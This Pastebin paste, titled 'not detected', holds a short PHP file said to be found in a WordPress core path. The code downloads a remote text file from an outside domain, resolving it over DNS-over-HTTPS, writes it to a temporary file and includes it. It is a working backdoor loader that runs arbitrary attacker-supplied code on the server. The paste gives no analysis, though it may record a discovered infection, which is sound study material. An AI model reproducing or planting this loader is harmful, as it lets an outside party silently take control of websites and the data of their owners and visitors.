dualaudi

not detected

Sep 29th, 2025 (edited)
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.57 KB | None | 0 0
  1. // found in wp-includes/SimplePie/auto-index.php
  2. <?php
  3. $url = 'https://cdn.privdayz.com/txt/gecko_decoded.txt';
  4. $dns = 'https://cloudflare-dns.com/dns-query';
  5.  
  6. $ch = curl_init($url);
  7. if (defined('CURLOPT_DOH_URL')) {
  8.     curl_setopt($ch, CURLOPT_DOH_URL, $dns);
  9. }
  10.  
  11. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  12. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  13. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
  14.  
  15. $res = curl_exec($ch);
  16. curl_close($ch);
  17.  
  18. $tmp = tmpfile();
  19. $path = stream_get_meta_data($tmp)['uri'];
  20.  
  21. fprintf($tmp, '%s', $res);
  22. include($path);
  23. ?>
  24.  
Advertisement
Add Comment
Please, Sign In to add comment